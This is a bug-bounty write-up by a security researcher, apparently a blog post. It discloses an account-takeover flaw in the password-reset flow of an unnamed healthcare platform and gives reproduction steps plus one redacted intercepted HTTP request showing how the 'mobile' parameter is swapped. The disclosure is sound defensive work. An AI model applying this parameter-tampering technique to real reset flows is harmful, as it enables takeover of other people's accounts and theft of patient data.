Hi hackers,

My name is Krishnadev P Melevila, To know more about me, Just search “Who is Krishnadev P Melevila” On Google or Ask your Google Assistant.

In my ongoing efforts to enhance the security landscape of web applications, I recently discovered a critical vulnerability on a healthcare platform. This vulnerability, which I reported on July 3rd, 2023, could potentially lead to an account takeover, posing a significant risk to patient data privacy. In this write-up, I aim to outline the details of the vulnerability while maintaining the confidentiality of the target platform.

Vulnerability Details:

Vulnerability Type: Account Takeover

Platform: Confidential

Impact Level: Critical

Risk: Patient account takeover leading to sensitive data loss

Priority: P1

Steps to Reproduce the Vulnerability:

1. Visit the platform’s website and navigate to the relevant login section.
2. Click on the “Forgot Password” option.
3. Enter a valid mobile number that is already registered as a user on the platform.
4. Enter the valid attacker’s OTP and click “Submit.”
5. Set a new password and submit the request while intercepting it using a web interceptor tool.

The Intercepted Request:

Below is an example of the intercepted request that exposes the vulnerability. Please note that specific details and target information have been redacted to ensure responsible disclosure.

[Intercepted Request]

POST [URL] HTTP/2 Host: [Host] Cookie: [Redacted] Content-Length: 63 Cache-Control: max-age=0 Sec-Ch-Ua: “Not:A-Brand”;v=”99", “Chromium”;v=”112" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: “Linux” Upgrade-Insecure-Requests: 1 Origin: [Origin] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: [Referer] Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

mobile=[Redacted]&isdcode=91&pwd=Hello%402002&cpwd=Hello%402002

Exploitation and Impact:

It’s time to exploit:

By exploiting this vulnerability, an attacker can bypass proper authentication on the platform. The vulnerability stems from improper validation of the “mobile” parameter, allowing an attacker to reset the password of any user account by modifying the request. This could result in unauthorized access to sensitive user information, including personal and private data.

I reported it to the affected organization, and they triaged my report in minimum time and rewarded me with a bounty of $60.

Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!

My Instagram handle: https://instagram.com/krishnadev_p_melevila

My Twitter handle: https://twitter.com/Krishnadev_P_M

My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/